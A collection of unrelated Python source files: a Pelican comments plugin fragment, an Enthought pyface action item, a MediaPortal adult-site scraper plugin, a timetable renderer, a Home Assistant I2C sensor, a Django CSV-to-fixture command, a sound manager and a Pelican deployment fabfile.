        # the article unique id is its relative source path,
        # so the comments are not dependant on the URL.
        source_path = content.get_relative_source_path()
        article_uuid = source_path.encode('utf8')
        thread = ArticleThread(storage_dir, article_uuid)
        thread = thread.asjson()
        for comment in thread['comments']:
            html = rst2html(comment['text'], theme='acr', body_only=True)
            comment['html'] = html
        content.metadata["comments"] = thread
    except Exception:
        # Pelican swallows plugin exceptions, so print the traceback
        # ourselves before re-raising.  Catching Exception instead of a
        # bare `except:` lets KeyboardInterrupt/SystemExit pass untouched.
        traceback.print_exc()
        raise
def register():
    """Pelican plugin entry point: hook the comment injector into the
    article-writing signal."""
    signals.article_generator_write_article.connect(add_comments)
|
#------------------------------------------------------------------------------
# Copyright (c) 2005, Enthought, Inc.
# All rights reserved.
#
# This software is provided without warranty under the terms of the BSD
# license included in enthought/LICENSE.txt and may be redistributed only
# under the conditions described in the aforementioned license. The license
# is also available online at http://www.enth373ought.com/licenses/BSD.txt
# Thanks for using Enthought open source!
#
# Author: Enthought, Inc.
# Description: <Enthought pyface package component>
#------------------------------------------------------------------------------
""" An action manager item that represents an actual action. """
# Enthought library imports.
from enthought.traits.api import Any, Instance, List, Property, Str
# Local imports.
from action import Action
from action_manager_item import ActionManagerItem
# Import the toolkit specific versions of the internal classes.
from enthought.pyface.toolkit import toolkit_object
_MenuItem = toolkit_object('action.action_item:_MenuItem')
_Tool = toolkit_object('action.action_item:_Tool')
_PaletteTool = toolkit_object('action.action_item:_PaletteTool')
class ActionItem(ActionManagerItem):
    """ An action manager item that represents an actual action. """

    #### 'ActionManagerItem' interface ########################################

    # The item's unique identifier ('unique' in this case means unique within
    # its group).
    id = Property(Str)

    #### 'ActionItem' interface ###############################################

    # The action!
    action = Instance(Action)

    # The toolkit specific control created for this item.
    control = Any

    # The toolkit specific Id of the control created for this item.
    #
    # We have to keep the Id as well as the control because wx tool bar tools
    # are created as 'wxObjectPtr's which do not have Ids, and the Id is
    # required to manipulate the state of a tool via the tool bar 8^(
    # FIXME v3: Why is this part of the public interface?
    control_id = Any

    #### Private interface ####################################################

    # All of the internal instances that wrap this item.
    _wrappers = List(Any)

    ###########################################################################
    # 'ActionManagerItem' interface.
    ###########################################################################

    #### Trait properties #####################################################

    def _get_id(self):
        """ Return the item's Id (delegated to the wrapped action). """
        return self.action.id

    #### Trait change handlers ################################################

    def _enabled_changed(self, trait_name, old, new):
        """ Static trait change handler: mirror 'enabled' onto the action. """
        self.action.enabled = new
        return

    def _visible_changed(self, trait_name, old, new):
        """ Static trait change handler: mirror 'visible' onto the action. """
        # Bug fix: this previously assigned True unconditionally, which made
        # it impossible to hide the item via this trait.  Mirror the new
        # value, exactly as _enabled_changed does.
        self.action.visible = new
        return

    ###########################################################################
    # 'ActionItem' interface.
    ###########################################################################

    def add_to_menu(self, parent, menu, controller):
        """ Adds the item to a menu.

        The controller, if given, may veto the addition via
        'can_add_to_menu'.
        """
        if (controller is None) or controller.can_add_to_menu(self.action):
            wrapper = _MenuItem(parent, menu, self, controller)
            # fixme: Martin, who uses this information?
            if controller is None:
                self.control = wrapper.control
                self.control_id = wrapper.control_id
            self._wrappers.append(wrapper)
        return

    def add_to_toolbar(self, parent, tool_bar, image_cache, controller,
                       show_labels=True):
        """ Adds the item to a tool bar.

        The controller, if given, may veto the addition via
        'can_add_to_toolbar'.
        """
        if (controller is None) or controller.can_add_to_toolbar(self.action):
            wrapper = _Tool(
                parent, tool_bar, image_cache, self, controller, show_labels
            )
            # fixme: Martin, who uses this information?
            if controller is None:
                self.control = wrapper.control
                self.control_id = wrapper.control_id
            self._wrappers.append(wrapper)
        return

    def add_to_palette(self, tool_palette, image_cache, show_labels=True):
        """ Adds the item to a tool palette (no controller veto here). """
        wrapper = _PaletteTool(tool_palette, image_cache, self, show_labels)
        self._wrappers.append(wrapper)
        return

    def destroy(self):
        """ Called when the action is no longer required.

        By default this method calls 'destroy' on the action itself.
        """
        self.action.destroy()
        return
#### EOF ######################################################################
|
# -*- coding: utf-8 -*-
###############################################################################################
#
# MediaPortal for Dreambox OS
#
# Coded by MediaPortal Team (c) 2013-2015
#
# This plugin is open source but it is NOT free software.
#
# This plugin may only be distributed to and executed on hardware which
# is licensed by Dream Property GmbH. This includes commercial distribution.
# In other words:
# It's NOT allowed to distribute any parts of this plugin or its source code in ANY way
# to hardware which is NOT licensed by Dream Property GmbH.
# It's NOT allowed to execute this plugin and its source code or even parts of it in ANY way
# on hardware which is NOT licensed by Dream Property GmbH.
#
# This applies to the source code as a whole as well as to parts of it, unless
# explicitely stated otherwise.
#
# If you want to use or modify the code or parts of it,
# you have to keep OUR license and inform us about the modifications, but it may NOT be
# commercially distributed other than under the conditions noted above.
#
# As an exception regarding modifcations, you are NOT permitted to remove
# any copy protections implemented in this plugin or change them for means of disabling
# or working around the copy protections, unless the change has been explicitly permitted
# by the original authors. Also decompiling and modification of the closed source
# parts is NOT permitted.
#
# Advertising with this plugin is NOT allowed.
# For other uses, permission from the authors is necessary.
#
###############################################################################################
from Plugins.Extensions.MediaPortal.plugin import _
from Plugins.Extensions.MediaPortal.resources.imports import *
class adultbayGenreScreen(MPScreen):
    """Top-level genre selection screen for the adultbay.org provider."""

    def __init__(self, session):
        self.plugin_path = mp_globals.pluginPath
        self.skin_path = mp_globals.pluginPath + mp_globals.skinsPath
        path = "%s/%s/defaultGenreScreen.xml" % (self.skin_path, config.mediaportal.skin.value)
        if not fileExists(path):
            # Fall back to the bundled default skin when the user skin does
            # not provide this screen layout.
            path = self.skin_path + mp_globals.skinFallback + "/defaultGenreScreen.xml"
        with open(path, "r") as f:
            self.skin = f.read()
            f.close()  # redundant: the with-block already closes the file
        MPScreen.__init__(self, session)
        self["actions"] = ActionMap(["MP_Actions"], {
            "ok" : self.keyOK,
            "0" : self.closeAll,
            "cancel": self.keyCancel
        }, -1)
        self['title'] = Label("The Adult Bay")
        self['ContentTitle'] = Label("Genre:")
        # keyLocked blocks OK presses until the genre list is populated.
        self.keyLocked = True
        self.suchString = ''
        self.filmliste = []
        self.ml = MenuList([], enableWrapAround=True, content=eListboxPythonMultiContent)
        self['liste'] = self.ml
        self.onLayoutFinish.append(self.genreData)

    def genreData(self):
        # Rows are (display name, category URL).  A None URL means the row
        # is either the search entry or a sub-genre menu handled in keyOK.
        self.filmliste.append(("--- Search ---", None))
        self.filmliste.append(("Newest (Clips)", "http://adultbay.org/category/clips/"))
        self.filmliste.append(("Newest (Movies)", "http://adultbay.org/category/movies/"))
        self.filmliste.append(("Clips", None))
        self.filmliste.append(("Movies", None))
        self.filmliste.append(("HDTV", None))
        self.filmliste.append(("DVD-R", "http://adultbay.org/category/dvd-r/"))
        self.filmliste.append(("Hentai", "http://adultbay.org/category/hentai/"))
        self.ml.setList(map(self._defaultlistcenter, self.filmliste))
        self.keyLocked = False

    def SuchenCallback(self, callback = None, entry = None):
        # Called with the text typed into the search box; '+' is the query
        # separator expected by the site's /search/<term>/ URL scheme.
        if callback is not None and len(callback):
            self.suchString = callback.replace(' ', '+')
            Link = self.suchString
            Name = "--- Search ---"
            self.session.open(adultbayListScreen, Link, Name)

    def keyOK(self):
        if self.keyLocked:
            return
        if not config.mediaportal.premiumize_use.value:
            message = self.session.open(MessageBoxExt, _("The Adult Bay only works with enabled MP premiumize.me option (MP Setup)!"), MessageBoxExt.TYPE_INFO, timeout=10)
            return
        Name = self['liste'].getCurrent()[0][0]
        Link = self['liste'].getCurrent()[0][1]
        if Name == "--- Search ---":
            self.suchen()
        elif Link != None:
            # Direct category URL -> movie list.
            self.session.open(adultbayListScreen, Link, Name)
        else:
            # No URL -> open the sub-genre menu for this label.
            self.session.open(adultbaySubGenreScreen, Name)
class adultbaySubGenreScreen(MPScreen):
    """Sub-genre list scraped from the site's category sidebar."""

    def __init__(self, session, Name):
        # Name is the top-level genre label whose children are listed.
        self.Name = Name
        self.plugin_path = mp_globals.pluginPath
        self.skin_path = mp_globals.pluginPath + mp_globals.skinsPath
        path = "%s/%s/defaultGenreScreen.xml" % (self.skin_path, config.mediaportal.skin.value)
        if not fileExists(path):
            path = self.skin_path + mp_globals.skinFallback + "/defaultGenreScreen.xml"
        with open(path, "r") as f:
            self.skin = f.read()
            f.close()  # redundant: the with-block already closes the file
        MPScreen.__init__(self, session)
        self["actions"] = ActionMap(["MP_Actions"], {
            "ok" : self.keyOK,
            "0" : self.closeAll,
            "cancel": self.keyCancel
        }, -1)
        self['title'] = Label("The Adult Bay")
        self['ContentTitle'] = Label("Genre:")
        self.keyLocked = True
        self.filmliste = []
        self.ml = MenuList([], enableWrapAround=True, content=eListboxPythonMultiContent)
        self['liste'] = self.ml
        self.onLayoutFinish.append(self.loadPage)

    def loadPage(self):
        url = "http://adultbay.org/"
        getPage(url, headers={'Content-Type':'application/x-www-form-urlencoded'}).addCallback(self.parseData).addErrback(self.dataError)

    def parseData(self, data):
        # Scope the scan to the <ul> following this genre's sidebar entry.
        # NOTE(review): if the genre is not found, `parse` is None and
        # parse.group(1) raises AttributeError — confirm dataError/errback
        # covers that path.
        parse = re.search('class="cat-item.*?>'+self.Name+'</a>(.*?)</ul>', data, re.S)
        raw = re.findall('<li\sclass="cat-item.*?a\shref="(.*?)".*?>(.*?)</a>', parse.group(1), re.S)
        if raw:
            self.filmliste = []
            for (Url, Title) in raw:
                self.filmliste.append((decodeHtml(Title), Url))
            self.filmliste.sort()
            self.ml.setList(map(self._defaultlistcenter, self.filmliste))
            self.keyLocked = False

    def keyOK(self):
        if self.keyLocked:
            return
        Name = self['liste'].getCurrent()[0][0]
        Link = self['liste'].getCurrent()[0][1]
        self.session.open(adultbayListScreen, Link, Name)
class adultbayListScreen(MPScreen, ThumbsHelper):
    """Paged movie list for one category URL (or a search query)."""

    def __init__(self, session, Link, Name):
        # Link: category URL, or the '+'-joined search term when Name is
        # the search marker.  Name: genre label shown in the header.
        self.Link = Link
        self.Name = Name
        self.plugin_path = mp_globals.pluginPath
        self.skin_path = mp_globals.pluginPath + mp_globals.skinsPath
        path = "%s/%s/defaultListWideScreen.xml" % (self.skin_path, config.mediaportal.skin.value)
        if not fileExists(path):
            path = self.skin_path + mp_globals.skinFallback + "/defaultListWideScreen.xml"
        with open(path, "r") as f:
            self.skin = f.read()
            f.close()  # redundant: the with-block already closes the file
        MPScreen.__init__(self, session)
        ThumbsHelper.__init__(self)
        self["actions"] = ActionMap(["MP_Actions"], {
            "ok" : self.keyOK,
            "0" : self.closeAll,
            "cancel": self.keyCancel,
            "5" : self.keyShowThumb,
            "up" : self.keyUp,
            "down" : self.keyDown,
            "right" : self.keyRight,
            "left" : self.keyLeft,
            "nextBouquet" : self.keyPageUp,
            "prevBouquet" : self.keyPageDown,
            "green" : self.keyPageNumber
        }, -1)
        self['title'] = Label("The Adult Bay")
        self['ContentTitle'] = Label("Genre: %s" % self.Name)
        self['F2'] = Label(_("Page"))
        self['Page'] = Label(_("Page:"))
        self.keyLocked = True
        self.ml = MenuList([], enableWrapAround=True, content=eListboxPythonMultiContent)
        self['liste'] = self.ml
        self.page = 1
        self.onLayoutFinish.append(self.loadPage)

    def loadPage(self):
        self.keyLocked = True
        self.filmliste = []
        if re.match(".*?Search", self.Name):
            # Search mode: Link holds the query string, not a URL.
            url = "http://adultbay.org/search/%s/page/%s/" % (self.Link, str(self.page))
        else:
            if self.page == 1:
                url = self.Link
            else:
                url = self.Link + "page/" + str(self.page) + "/"
        getPage(url, headers={'Content-Type':'application/x-www-form-urlencoded'}).addCallback(self.parseData).addErrback(self.dataError)

    def parseData(self, data):
        # Rows are (title, link, image, desc); placeholder rows carry None
        # in every slot except the title.
        if re.match('.*?<h2>Not Found</h2>', data, re.S):
            self.filmliste.append((_('No movies found!'), None, None, None))
            self.ml.setList(map(self._defaultlistleft, self.filmliste))
        elif re.match('.*?<h2>Sorry: No Results</h2>', data, re.S):
            self.filmliste.append((_('No movies found!'), None, None, None))
            self.ml.setList(map(self._defaultlistleft, self.filmliste))
        elif re.match('.*?Search is temporarily disabled', data, re.S):
            self.filmliste.append(("Search is temporarily disabled...", None, None, None))
            self.ml.setList(map(self._defaultlistleft, self.filmliste))
        else:
            # Determine the last page number, preferring the wp-pagenavi
            # widget, then the "Older Entries" navigation link.
            parse = re.search('class="wp-pagenavi">(.*?)</div>', data, re.S)
            if parse:
                lastpage = re.findall('\d{0,1},{0,1}\d+', parse.group(1), re.S)
                lastpage = [x.replace(',', '') for x in lastpage]
                lastpage = [int(x) for x in lastpage]
                lastpage.sort(key=int)
                self.lastpage = int(lastpage[-1])
                self['page'].setText("%s / %s" % (str(self.page), str(self.lastpage)))
            else:
                parse = re.search('class="navigation">.*?/page/(.*?)/.*?Older Entries', data, re.S)
                if parse:
                    self.lastpage = int(parse.group(1))
                else:
                    self.lastpage = 1
                self['page'].setText("%s / %s" % (str(self.page), str(self.lastpage)))
            raw = re.findall('class="post".*?<a\shref="(.*?)".*?img\ssrc="(.*?)".*?(<strong>|<p>)(.*?)(</strong>|<br\s/>|</p>).*?<p>(.*?)(Read\smore|\(more...\))', data, re.S)
            if raw:
                for (link, image, trash, title, trash, desc, trash) in raw:
                    title = stripAllTags(title).strip()
                    desc = stripAllTags(desc).strip()
                    self.filmliste.append((decodeHtml(title), link, image, desc))
                self.ml.setList(map(self._defaultlistleft, self.filmliste))
                self.ml.moveToIndex(0)
                self.keyLocked = False
                self.th_ThumbsQuery(self.filmliste, 0, 1, 2, None, None, self.page, self.lastpage, mode=1)
                self.showInfos()

    def showInfos(self):
        title = self['liste'].getCurrent()[0][0]
        self['name'].setText(title)
        desc = self['liste'].getCurrent()[0][3]
        self['handlung'].setText(desc)
        coverUrl = self['liste'].getCurrent()[0][2]
        CoverHelper(self['coverArt']).getCover(coverUrl)

    def keyOK(self):
        if self.keyLocked:
            return
        # NOTE(review): rows are (title, link, image, desc), so 'Link' below
        # actually holds the title and 'Title' holds the URL.  The two swaps
        # cancel out because StreamAuswahl's signature is (session, Title,
        # Link, Cover) — but the None guard tests the title, which is never
        # None, so placeholder rows (whose URL is None) are not filtered.
        Link = self['liste'].getCurrent()[0][0]
        if Link == None:
            return
        Title = self['liste'].getCurrent()[0][1]
        Cover = self['liste'].getCurrent()[0][2]
        self.session.open(StreamAuswahl, Link, Title, Cover)
class StreamAuswahl(MPScreen):
    """Hoster selection screen for one post: scrape supported stream links
    from the post body and play the chosen one."""

    def __init__(self, session, Title, Link, Cover):
        self.Link = Link
        self.Title = Title
        self.Cover = Cover
        self.plugin_path = mp_globals.pluginPath
        self.skin_path = mp_globals.pluginPath + mp_globals.skinsPath
        path = "%s/%s/defaultListWideScreen.xml" % (self.skin_path, config.mediaportal.skin.value)
        if not fileExists(path):
            path = self.skin_path + mp_globals.skinFallback + "/defaultListWideScreen.xml"
        with open(path, "r") as f:
            self.skin = f.read()
            f.close()  # redundant: the with-block already closes the file
        MPScreen.__init__(self, session)
        self["actions"] = ActionMap(["MP_Actions"], {
            "ok" : self.keyOK,
            "0" : self.closeAll,
            "cancel": self.keyCancel
        }, -1)
        self['title'] = Label("The Adult Bay")
        self['ContentTitle'] = Label("%s" %self.Title)
        self.filmliste = []
        self.keyLocked = True
        self.ml = MenuList([], enableWrapAround=True, content=eListboxPythonMultiContent)
        self['liste'] = self.ml
        self.onLayoutFinish.append(self.loadPage)

    def loadPage(self):
        CoverHelper(self['coverArt']).getCover(self.Cover)
        self.keyLocked = True
        url = self.Link
        getPage(url, headers={'Content-Type':'application/x-www-form-urlencoded'}).addCallback(self.loadPageData).addErrback(self.dataError)

    def loadPageData(self, data):
        # NOTE(review): if the marker text is missing, `parse` is None and
        # parse.group(1) raises AttributeError — confirm the errback path
        # handles that.
        parse = re.search('class="post_header">(.*?)Recommends:</h2>', data, re.S)
        # Collect external (non-adultbay.org) links, keeping only hosters
        # the streaming backend supports.
        streams = re.findall('(http://(?!adultbay.org)(.*?)\/.*?)[\'|"|\&|<]', parse.group(1), re.S)
        if streams:
            for (stream, hostername) in streams:
                if isSupportedHoster(hostername, True):
                    hostername = hostername.replace('www.','')
                    self.filmliste.append((hostername, stream))
        # remove duplicates
        self.filmliste = list(set(self.filmliste))
        if len(self.filmliste) == 0:
            self.filmliste.append((_('No supported streams found!'), None))
        self.ml.setList(map(self._defaultlisthoster, self.filmliste))
        self.keyLocked = False

    def keyOK(self):
        if self.keyLocked:
            return
        url = self['liste'].getCurrent()[0][1]
        if url == None:
            return
        get_stream_link(self.session).check_link(url, self.got_link)

    def got_link(self, stream_url):
        if stream_url == None:
            message = self.session.open(MessageBoxExt, _("Stream not found, try another Stream Hoster."), MessageBoxExt.TYPE_INFO, timeout=3)
        else:
            title = self.Title  # NOTE(review): unused local — self.Title is used directly below
            self.session.open(SimplePlayer, [(self.Title, stream_url, self.Cover)], showPlaylist=False, ltype='adultbay', cover=True)
|
import tempfile
import os
from uuid import uuid4
from prettytable import PrettyTable
from timetabler.util import iter_time, DAY_LIST
class Schedule(object):
    """A concrete timetable: one chosen section-set per course.

    NOTE(review): this module uses Python 2 idioms (dict.itervalues /
    iteritems below) — it will not run unmodified on Python 3.
    """

    def __init__(self, sched):
        """Schedule

        e.g. for ``sched``:

        ((Lab<status='Restricted', section='EECE 381 L2A', term='2', days='[u'Tue', u'Thu']', start_time='16:00', end_time='19:00'>,
          Lecture<status='Restricted', section='EECE 381 201', term='2', days='[u'Mon']', start_time='9:00', end_time='11:00'>),
         (Lab<status='Restricted', section='EECE 353 L2C', term='2', days='[u'Thu']', start_time='14:00', end_time='16:00'>,
          Lecture<status='', section='EECE 353 201', term='2', days='[u'Tue', u'Thu']', start_time='14:00', end_time='15:30'>),
         (Lecture<status='', section='CPSC 304 201', term='2', days='[u'Tue', u'Thu']', start_time='11:00', end_time='12:30'>,
          Tutorial<status='', section='CPSC 304 T2A', term='2', days='[u'Fri']', start_time='14:00', end_time='15:00'>))
        """
        self._sched = sched
        # Flatten the per-course tuples into one list of activities.
        self.activities = [act for crs in sched for act in crs]

    def activities_for_day(self, day):
        """Return all activities that meet on ``day`` (e.g. "Mon")."""
        return [a for a in self.activities if day in a.days]

    def activity_at_time(self, time="09:00", day="Mon", term=1):
        """Return the single activity running at ``time`` on ``day`` in
        ``term``, or None if that slot is free."""
        res = [a for a in self.activities if all([
            a.start_time <= time,
            a.end_time > time,
            day in a.days,
            term == a.term
        ])]
        # A valid schedule has no overlaps, so at most one match.
        assert len(res) in [0, 1], ("More than one activity found at specified time. "
                                    "This likely means the code is wrong.")
        if res:
            return res[0]
        else:
            return None

    def _draw(self, term=1):
        """Build a PrettyTable grid (time rows x day columns) for ``term``."""
        t = PrettyTable(["Time"] + DAY_LIST)
        earliest_start_time = min(a.start_time for a in self.activities)
        latest_end_time = max(a.end_time for a in self.activities)
        time_iter = iter_time(earliest_start_time, latest_end_time)
        for time in time_iter:
            # Empty string for free slots (getattr default when no activity).
            t.add_row([time] + [getattr(self.activity_at_time(time, day, term), 'section', "") for day in DAY_LIST])
        return t

    def _create_table_div(self, table):
        """Wrap a table's HTML in the CSSTableGenerator styling div."""
        return "\n{}\n{}\n{}\n".format(
            '<div class="CSSTableGenerator">',
            table.get_html_string(),
            '</div>'
        )

    def draw(self, terms=(1,), draw_location="browser", title_format="code"):
        """Draw schedule

        :type terms: tuple or list
        :param terms: Terms for which you would like to draw the schedule
        :param draw_location: "browser"|"terminal"
        :param title_format: "title"|"code"
        :returns: List of tables
        :rtype: list
        """
        assert draw_location in ["browser", "terminal"]
        tables = {term: self._draw(term) for term in terms}
        if draw_location=="browser":
            # Write a throw-away HTML file and open it in the default browser.
            tempdir = tempfile.gettempdir()
            tempfile_loc = os.path.join(tempdir, "ubc-timetabler_{}.html".format(uuid4().hex))
            with open(tempfile_loc, 'w+') as f:
                html = "{}{}{}".format(
                    """<html>
                    <head>
                    <!-- Bring to you by http://www.CSSTableGenerator.com -->
                    <link rel="stylesheet" \
                    href="https://raw.githubusercontent.com/hfaran/ubc-timetabler/master/css/table.css" \
                    type="text/css"/>
                    </head>
                    <body>
                    """,
                    "</br></br></br>\n".join(map(self._create_table_div, tables.itervalues())),
                    """
                    </body>
                    </html>"""
                )
                f.write(html)
            import webbrowser
            webbrowser.open('file://' + os.path.realpath(tempfile_loc))
        elif draw_location=="terminal":
            for term, table in tables.iteritems():
                title_formatters = {
                    "title": lambda act: act.course.title,
                    "code": lambda act: "{} {}".format(act.course.dept, act.course.number)
                }
                print("Courses for Term {}: {}".format(
                    term,
                    ", ".join({title_formatters[title_format](act)
                               for act in self.activities if act.term == term})
                ))
                print(table)
        return tables
|
"""Support for binary sensor using I2C MCP23017 chip."""
import logging
from adafruit_mcp230xx.mcp23017 import MCP23017 # pylint: disable=import-error
import board # pylint: disable=import-error
import busio # pylint: disable=import-error
import digitalio # pylint: disable=import-error
import voluptuous as vol
from homeassistant.components.binary_sensor import PLATFORM_SCHEMA, BinarySensorDevice
from homeassistant.const import DEVICE_DEFAULT_NAME
import homeassistant.helpers.config_validation as cv
_LOGGER = logging.getLogger(__name__)

# Configuration keys accepted by this platform.
CONF_INVERT_LOGIC = "invert_logic"
CONF_I2C_ADDRESS = "i2c_address"
CONF_PINS = "pins"
CONF_PULL_MODE = "pull_mode"

# Accepted values for pull_mode (normalized to upper case by the schema).
MODE_UP = "UP"
MODE_DOWN = "DOWN"

DEFAULT_INVERT_LOGIC = False
DEFAULT_I2C_ADDRESS = 0x20  # MCP23017 factory default (A0-A2 tied low)
DEFAULT_PULL_MODE = MODE_UP

# Mapping of MCP23017 pin number -> entity name.
_SENSORS_SCHEMA = vol.Schema({cv.positive_int: cv.string})

PLATFORM_SCHEMA = PLATFORM_SCHEMA.extend(
    {
        vol.Required(CONF_PINS): _SENSORS_SCHEMA,
        vol.Optional(CONF_INVERT_LOGIC, default=DEFAULT_INVERT_LOGIC): cv.boolean,
        vol.Optional(CONF_PULL_MODE, default=DEFAULT_PULL_MODE): vol.All(
            vol.Upper, vol.In([MODE_UP, MODE_DOWN])
        ),
        vol.Optional(CONF_I2C_ADDRESS, default=DEFAULT_I2C_ADDRESS): vol.Coerce(int),
    }
)
def setup_platform(hass, config, add_devices, discovery_info=None):
    """Set up the MCP23017 binary sensors."""
    pull_mode = config[CONF_PULL_MODE]
    invert_logic = config[CONF_INVERT_LOGIC]
    i2c_address = config[CONF_I2C_ADDRESS]

    # One I2C bus, one chip at the configured address.
    bus = busio.I2C(board.SCL, board.SDA)
    chip = MCP23017(bus, address=i2c_address)

    # One entity per configured pin (pin number -> friendly name).
    sensors = [
        MCP23017BinarySensor(pin_name, chip.get_pin(pin_num), pull_mode, invert_logic)
        for pin_num, pin_name in config[CONF_PINS].items()
    ]
    add_devices(sensors, True)
class MCP23017BinarySensor(BinarySensorDevice):
    """Represent a binary sensor that uses MCP23017."""

    def __init__(self, name, pin, pull_mode, invert_logic):
        """Initialize the MCP23017 binary sensor."""
        self._name = name or DEVICE_DEFAULT_NAME
        self._pin = pin
        self._pull_mode = pull_mode
        self._invert_logic = invert_logic
        self._state = None
        self._pin.direction = digitalio.Direction.INPUT
        # NOTE(review): pull_mode is stored but never applied — the pull
        # resistor is unconditionally set to UP below.  Possibly deliberate,
        # since the MCP23017 hardware provides internal pull-ups only;
        # confirm before honouring MODE_DOWN here.
        self._pin.pull = digitalio.Pull.UP

    @property
    def name(self):
        """Return the name of the sensor."""
        return self._name

    @property
    def is_on(self):
        """Return the state of the entity."""
        # invert_logic flips the reported state relative to the raw pin level.
        return self._state != self._invert_logic

    def update(self):
        """Update the GPIO state."""
        self._state = self._pin.value
|
""""
usage-
./manage.py builddata load_knowledgebase_csv ~/Documents/Scratch/knowledgebase.csv
Creates derived dataset of constants used by JS frontend. Data is sourced from cla_common.
you can then load the fixture with-
./manage.py loaddata cla_backend/apps/knowledgebase/fixtures/kb_from_spreadsheet.json
"""
from django.core.management.base import BaseCommand
import os
import sys
from ._csv_2_fixture import KnowledgebaseCsvParse
class Command(BaseCommand):
    args = "load_knowledgebase_csv CSV_FILE.csv"
    help = (
        "Create a derived dataset. At present, just load_knowledgebase_csv "
        "is implemented. It loads a CSV spreadsheet into a fixture ready "
        "to be loaddata'ed into DB"
    )

    # Destination fixture, relative to the project root.
    KNOWLEDGEBASE_FIXTURE = "cla_backend/apps/knowledgebase/fixtures/kb_from_spreadsheet.json"

    def handle(self, *args, **options):
        """Convert the CSV given as the second argument into a JSON fixture.

        Exits with status -1 when the argument count is wrong or the CSV
        file is unreadable.
        """
        if args[0] == "load_knowledgebase_csv":
            if len(args) != 2:
                self.stdout.write("Last argument needs to be path to CSV file")
                sys.exit(-1)
            if not os.access(args[1], os.R_OK):
                self.stdout.write("File '%s' couldn't be read" % args[1])
                sys.exit(-1)
            # read in CSV and feed to fixture builder; the with-blocks
            # guarantee both handles are closed even if parsing fails
            # (the originals leaked on exception).
            with open(args[1], "rU") as f_in:
                c = KnowledgebaseCsvParse(f_in)
                json = c.fixture_as_json()
            # write json doc to fixture file
            with open(self.KNOWLEDGEBASE_FIXTURE, "w") as f_out:
                f_out.write(json)
            self.stdout.write("Fixture written to %s" % self.KNOWLEDGEBASE_FIXTURE)
|
#!/usr/bin/env python
import sys
import os
import time
import random
import alsaaudio
import pyttsx
from subprocess import call
#
# Our sound coordinator
#
class SoundManager ():
    """Coordinates sound playback, text-to-speech and mixer mute state."""

    SOUND_PLAYER = 'mpg123'
    SOUNDS_DIR = os.path.dirname(__file__) + '/sounds'
    SOUND_FILE_EXT = 'mp3'

    # Legacy class-level defaults kept for backward compatibility; every
    # instance gets its own lists in __init__ (the originals were mutable
    # class attributes, silently shared by all instances).
    sound_list = []
    next_in_queue = []

    def __init__(self):
        self.requires(self.SOUND_PLAYER)
        self.mixer = alsaaudio.Mixer('PCM')
        self.speech_engine = pyttsx.init()
        # Per-instance state (see note on the class attributes above).
        self.sound_list = []
        self.next_in_queue = []
        ext = ".%s" % self.SOUND_FILE_EXT
        for dirpath, dirnames, filenames in os.walk(self.SOUNDS_DIR):
            for filename in filenames:
                if filename.endswith(ext):
                    full_path = os.path.join(dirpath, filename)
                    self.sound_list.append(full_path)

    @staticmethod
    def requires(utility):
        """Exit the program if an external utility is not on PATH."""
        with open(os.devnull, 'w') as devnull:
            if call(['which', utility], stdout=devnull, stderr=devnull) != 0:
                print("Sound manager requires '%s' utility" % utility)
                sys.exit(1)

    def play(self, filepath):
        """Play one file with the external player; True on success."""
        with open(os.devnull, 'w') as devnull:
            ret = call([self.SOUND_PLAYER, filepath],
                       stdout=devnull, stderr=devnull)
        return ret == 0

    def play_random(self):
        """Play a uniformly random sound; False when none are available."""
        if self.sound_list:
            return self.play(random.choice(self.sound_list))
        return False

    def play_next(self):
        """Play sounds in shuffled order with no repeats until the whole
        list has been exhausted, then reshuffle."""
        if len(self.next_in_queue) <= 0:
            l = len(self.sound_list)
            if l > 0:
                # list(...) keeps this valid on Python 3 as well, where
                # range objects cannot be shuffled in place.
                self.next_in_queue = list(range(0, l))
                random.shuffle(self.next_in_queue)
            else:
                return False
        sound_position_id = self.next_in_queue.pop()
        return self.play(self.sound_list[sound_position_id])

    def say(self, text):
        """Speak ``text`` synchronously via the TTS engine."""
        self.speech_engine.say(text)
        self.speech_engine.runAndWait()

    def mute(self):
        self.mixer.setmute(1)

    def unmute(self):
        self.mixer.setmute(0)
|
from fabric.api import *
import fabric.contrib.project as project
import os
import shutil
import sys
import SocketServer
from pelican.server import ComplexHTTPRequestHandler
# Local path configuration (can be absolute or relative to fabfile)
env.deploy_path = 'output'
DEPLOY_PATH = env.deploy_path

# Remote server configuration
production = 'root@localhost:22'
# NOTE(review): 'n' looks like a placeholder remote directory — confirm the
# intended rsync destination before running `publish`.
dest_path = 'n'

# Rackspace Cloud Files configuration settings
env.cloudfiles_username = 'my_rackspace_username'
env.cloudfiles_api_key = 'my_rackspace_api_key'
env.cloudfiles_container = 'my_cloudfiles_container'

# Github Pages configuration
env.github_pages_branch = "gh-pages"

# Port for `serve`
PORT = 8000
def clean():
    """Delete the generated output directory and recreate it empty."""
    if not os.path.isdir(DEPLOY_PATH):
        return
    shutil.rmtree(DEPLOY_PATH)
    os.makedirs(DEPLOY_PATH)
def build():
    """Build the local (development) version of the site."""
    cmd = 'pelican -s pelicanconf.py'
    local(cmd)
def rebuild():
    """Run `clean` followed by `build`."""
    for step in (clean, build):
        step()
def regenerate():
    """Watch sources and regenerate the site on every modification."""
    cmd = 'pelican -r -s pelicanconf.py'
    local(cmd)
def serve():
    """Serve site at http://localhost:8000/"""
    os.chdir(env.deploy_path)

    class AddressReuseTCPServer(SocketServer.TCPServer):
        # Allow quick restarts without waiting out TIME_WAIT sockets.
        allow_reuse_address = True

    httpd = AddressReuseTCPServer(('', PORT), ComplexHTTPRequestHandler)
    sys.stderr.write('Serving on port {0} ...\n'.format(PORT))
    httpd.serve_forever()
def reserve():
    """Run `build`, then `serve`."""
    build()
    serve()
def preview():
    """Build the production version of the site."""
    cmd = 'pelican -s publishconf.py'
    local(cmd)
def cf_upload():
    """Publish to Rackspace Cloud Files via the swift CLI."""
    rebuild()
    swift_cmd = ('swift -v -A https://auth.api.rackspacecloud.com/v1.0 '
                 '-U {cloudfiles_username} '
                 '-K {cloudfiles_api_key} '
                 'upload -c {cloudfiles_container} .').format(**env)
    with lcd(DEPLOY_PATH):
        local(swift_cmd)
@hosts(production)
def publish():
    """Build the production site and rsync it to the remote host."""
    local('pelican -s publishconf.py')
    project.rsync_project(
        local_dir=DEPLOY_PATH.rstrip('/') + '/',
        remote_dir=dest_path,
        delete=True,
        exclude=".DS_Store",
        extra_opts='-c',
    )
def gh_pages():
    """Publish to the configured GitHub Pages branch via ghp-import."""
    rebuild()
    for template in ("ghp-import -b {github_pages_branch} {deploy_path}",
                     "git push origin {github_pages_branch}"):
        local(template.format(**env))
